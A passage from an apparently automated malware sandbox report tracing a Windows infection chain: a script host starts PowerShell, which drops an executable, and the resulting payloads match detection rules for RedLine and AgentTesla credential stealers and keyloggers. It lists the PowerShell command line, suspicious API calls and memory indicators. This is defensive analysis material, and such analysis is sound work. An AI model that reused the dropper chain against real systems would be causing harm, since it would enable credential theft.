              Source: wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wscript.exe, 00000001.00000002.1775625595.000001B50CDEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: powershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.8:49707 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, n00.cs.Net Code: XmzxwEo1
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,5_2_0046DC80
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,5_2_0044C37A
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0047C81C

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 5.2.x.exe.2f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1212, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,5_2_00431BE8
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,5_2_00446313
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,5_2_004333BE
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0042200C5_2_0042200C
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0041A2175_2_0041A217
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004122165_2_00412216
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0042435D5_2_0042435D
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004033C05_2_004033C0
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044F4305_2_0044F430
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004125E85_2_004125E8
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044663B5_2_0044663B
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004096A05_2_004096A0
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004138015_2_00413801
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0042096F5_2_0042096F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004129D05_2_004129D0
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004119E35_2_004119E3
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0041C9AE5_2_0041C9AE
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0047EA6F5_2_0047EA6F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0040FA105_2_0040FA10
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044EB5F5_2_0044EB5F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00423C815_2_00423C81
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00411E785_2_00411E78
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00442E0C5_2_00442E0C
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00420EC05_2_00420EC0
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044CF175_2_0044CF17
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00444FD25_2_00444FD2
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02F336305_2_02F33630
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00408C606_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040DC116_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00407C3F6_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00418CCC6_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00406CA06_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004028B06_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A4BE6_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004182446_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004016506_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402F206_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004193C46_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004187886_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402F896_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402B906_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004073A06_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02CED7806_2_02CED780
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02CECB686_2_02CECB68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02CE12986_2_02CE1298
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02CECEB06_2_02CECEB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02CE0FD06_2_02CE0FD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02CE10306_2_02CE1030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0570CF186_2_0570CF18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_057062096_2_05706209
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05709D976_2_05709D97
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_057061586_2_05706158
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0570F92B6_2_0570F92B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_057000406_2_05700040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_058205D06_2_058205D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_058267686_2_05826768
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0582A6906_2_0582A690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_058253C76_2_058253C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_05821DC06_2_05821DC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_058289686_2_05828968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_058216D06_2_058216D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 004115D7 appears 36 times
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 00445AE0 appears 65 times
              Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 5.2.x.exe.2f40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: Process Memory Space: powershell.exe PID: 1212, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
